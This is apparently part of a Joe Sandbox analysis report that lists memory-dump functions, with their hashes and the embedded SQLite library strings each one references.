                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %g,%g'$ %s$%c%g,%g$<polyline points=$></polyline>
                                                                • API String ID: 0-3443809342
                                                                • Opcode ID: 27de8a176392329548cd4f1adebe36a5dbd290c1fc450e17e49d5753a9385965
                                                                • Instruction ID: 5f6b0c942d82674363ed74f792a855ca8c651191fcd17b2e4ea16a239c850342
                                                                • Opcode Fuzzy Hash: 27de8a176392329548cd4f1adebe36a5dbd290c1fc450e17e49d5753a9385965
                                                                • Instruction Fuzzy Hash: F5614970D04711ABD701AF24DC89BA773B5AF42326F01462AE8095B253E735F986CBE3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %!.15g$%!.20e$%lld$NULL$NULL
                                                                • API String ID: 0-2115304644
                                                                • Opcode ID: be408bc4595c4408e5e8c5a3d2af5a12a9ddf37a84f121aa2a80d8d968eae56d
                                                                • Instruction ID: 5d0d117f46364286382650e53df17cabbfd618971483eaf92e6df7b51d0da587
                                                                • Opcode Fuzzy Hash: be408bc4595c4408e5e8c5a3d2af5a12a9ddf37a84f121aa2a80d8d968eae56d
                                                                • Instruction Fuzzy Hash: 785157799087119BD701EF28CC41AABB7F4EF85304F064A9CF89967213E339E50587A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-2988319395
                                                                • Opcode ID: 704a572a49613f87bf1b3edfba1b2cf6cfe90a6da2d787c61a0d0f294e19fcef
                                                                • Instruction ID: 89164b372f8a45bbaa79c4cba0e73628c83fa8248256f994aaa2f78e579a7921
                                                                • Opcode Fuzzy Hash: 704a572a49613f87bf1b3edfba1b2cf6cfe90a6da2d787c61a0d0f294e19fcef
                                                                • Instruction Fuzzy Hash: BAD1F4B09483419BD7028F28DC89B6BB7E4BF41365F21852DE99D8B342E735E544CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,origin
                                                                • API String ID: 0-4198660907
                                                                • Opcode ID: 67b05f0aa20ebd248a43f21b912a62c61f7549fd857781d7abe088388447860f
                                                                • Instruction ID: 6bec59283d06b859ab17a161877b198fa445c4df539760ac380f95e4ac43dd77
                                                                • Opcode Fuzzy Hash: 67b05f0aa20ebd248a43f21b912a62c61f7549fd857781d7abe088388447860f
                                                                • Instruction Fuzzy Hash: D071AEB2409302EFD7119F58D884A2AB7F5FF85721F51492EE9868B222D732E854CB53
                                                                Strings
                                                                • misuse, xrefs: 1D814C34
                                                                • rtree constraint failed: %s.(%s<=%s), xrefs: 1D814BF9
                                                                • UNIQUE constraint failed: %s.%s, xrefs: 1D814BC9
                                                                • API called with finalized prepared statement, xrefs: 1D814C1E
                                                                • %s at line %d of [%.10s], xrefs: 1D814C39
                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1D814C2A
                                                                • SELECT * FROM %Q.%Q, xrefs: 1D814B25
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
                                                                • API String ID: 0-2013246442
                                                                • Opcode ID: 5a94bc71bcbd5f463e213fb60b59dd9a46488a675593b6e53dcd7f4478c29697
                                                                • Instruction ID: 4dc11ba9014f6afe6790b42729dc8e5553be7b7fee59715b94a20098fcfdf27b
                                                                • Opcode Fuzzy Hash: 5a94bc71bcbd5f463e213fb60b59dd9a46488a675593b6e53dcd7f4478c29697
                                                                • Instruction Fuzzy Hash: 95412975908215FFE7015F6DDC88FBB3768EF81665F010639FE059A212E731A90886B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s%c%s$winFullPathname1$winFullPathname2
                                                                • API String ID: 0-2846052723
                                                                • Opcode ID: f0c71ab2d38d036597fd753dae4ca5c93263a435a7ac77baa4ac6bd8570628f9
                                                                • Instruction ID: 269b6d66136757a1898ef75528f501080f2f1208f910a5e5bd2eac96e48abc3e
                                                                • Opcode Fuzzy Hash: f0c71ab2d38d036597fd753dae4ca5c93263a435a7ac77baa4ac6bd8570628f9
                                                                • Instruction Fuzzy Hash: FC41E0A1A0C342FBEB107634FC84FB737A99F81135F15416DFA8A56052DB26E406C263
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: SELECT * FROM %Q.%Q$SELECT * FROM %Q.'%q_rowid'$Schema corrupt or not an rtree$_parent$_rowid
                                                                • API String ID: 0-2087119806
                                                                • Opcode ID: 89084c60d63e8994209ac4986717b74e3fadba41869da76f3147510416f84424
                                                                • Instruction ID: 9554018b7c93e80c490072dc46263b6fdeea8e051719bfdd9ee47efa30fdccd9
                                                                • Opcode Fuzzy Hash: 89084c60d63e8994209ac4986717b74e3fadba41869da76f3147510416f84424
                                                                • Instruction Fuzzy Hash: D541E1B5908341AFC704DBACDC8496F77E8AFD5614F02193EF685D7121E270E9488B93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-3679126755
                                                                • Opcode ID: edfc51102b65decc929a2f111b53d4c69006e5ec7ab19593212814e1da0b06f4
                                                                • Instruction ID: d979ba46e2a6faba95688fbded3b0bf34daec5187a9bd804b587964813ce20dd
                                                                • Opcode Fuzzy Hash: edfc51102b65decc929a2f111b53d4c69006e5ec7ab19593212814e1da0b06f4
                                                                • Instruction Fuzzy Hash: B541D270614604EBE710CF68EC84FE7B3A5AF80316F064469F5A99B392E7A0E4408793
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: content$docsize
                                                                • API String ID: 0-1024698521
                                                                • Opcode ID: 88961961bf3162633dff27eaf6d9a1048ca7ccf21ef63346cbac5160df396d60
                                                                • Instruction ID: 500ab94c348d2980d4be3858190277f1ed1d002c720fd1206933ecd4a4891b0f
                                                                • Opcode Fuzzy Hash: 88961961bf3162633dff27eaf6d9a1048ca7ccf21ef63346cbac5160df396d60
                                                                • Instruction Fuzzy Hash: 8AC1D172908312ABC712CF14CC84B6BB3E4AF84364F458628FE4997261D775E855CB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %!0.15g$%lld$JSON cannot hold BLOB values
                                                                • API String ID: 0-1047910854
                                                                • Opcode ID: b17e44b1d484362581c1aed03a74d6f7e7b2e97af1aadcfd06b97ca225b2e835
                                                                • Instruction ID: 1e5e6a61dc2b6e1cea5a3b68beda101be12cb3944bf4ed160054ee56ce431145
                                                                • Opcode Fuzzy Hash: b17e44b1d484362581c1aed03a74d6f7e7b2e97af1aadcfd06b97ca225b2e835
                                                                • Instruction Fuzzy Hash: 2551EE7A508200BEE3105A18EC45FBA3766DF823B5F15024EFA4547293FB67F14142A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
                                                                • API String ID: 0-1763475469
                                                                • Opcode ID: 2f7b14a94931ae1b4143a5df996387a72d9c8c2bcde7dee85738be7545d0739f
                                                                • Instruction ID: f56b1b0622a4fd5dd5266e0b2f6225830de8cb27b08c9ba7d11ea676558f75d2
                                                                • Opcode Fuzzy Hash: 2f7b14a94931ae1b4143a5df996387a72d9c8c2bcde7dee85738be7545d0739f
                                                                • Instruction Fuzzy Hash: 9F71917480D3829BD310CF24D984B6ABBF0FF88314F008A5EE98897252E735E545CBA3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                • API String ID: 0-860711957
                                                                • Opcode ID: 2a864d5afa0aab2932bd2a943013ed960cb69f3f9df9cc86a805e291d33420e1
                                                                • Instruction ID: 3852e429968b8fbc31aeb1b3b983f02ca8cd58ca31f85ad75be332fd05e3d12f
                                                                • Opcode Fuzzy Hash: 2a864d5afa0aab2932bd2a943013ed960cb69f3f9df9cc86a805e291d33420e1
                                                                • Instruction Fuzzy Hash: A6B147B4A04B419FE750AF28DC44B6B77E4BF60339F04453EE99A87242E775E40587A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: JSON path error near '%q'$malformed JSON
                                                                • API String ID: 0-560895927
                                                                • Opcode ID: e8f38dfaf1ccd7023063209011facbe0b864143ddb3d6779d4ce6848a2315cad
                                                                • Instruction ID: 1103c3ae0b7d4d8ec4bc866a178ea57fd7e7349aa634289e910d877411e7df7d
                                                                • Opcode Fuzzy Hash: e8f38dfaf1ccd7023063209011facbe0b864143ddb3d6779d4ce6848a2315cad
                                                                • Instruction Fuzzy Hash: 31A155B59043419BD710DF28D849B77B7E0AF80324F15853EE5898B252E736F94ACB93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %Q.$=%Q$PRAGMA
                                                                • API String ID: 0-2099833060
                                                                • Opcode ID: c3627da3bf841fc8af4c3fcb5c87d994e4cc8f829b72b40bf289013395110c3d
                                                                • Instruction ID: 0f68f1dbe336d0f72199485e80190ce96728ce03049af8032949c3ad60b51f63
                                                                • Opcode Fuzzy Hash: c3627da3bf841fc8af4c3fcb5c87d994e4cc8f829b72b40bf289013395110c3d
                                                                • Instruction Fuzzy Hash: CB71E4759082019BE700DF28DC84B6BB7B4AF44325F09466EFD459B252E736E905CBB3
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true
                                                                • Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
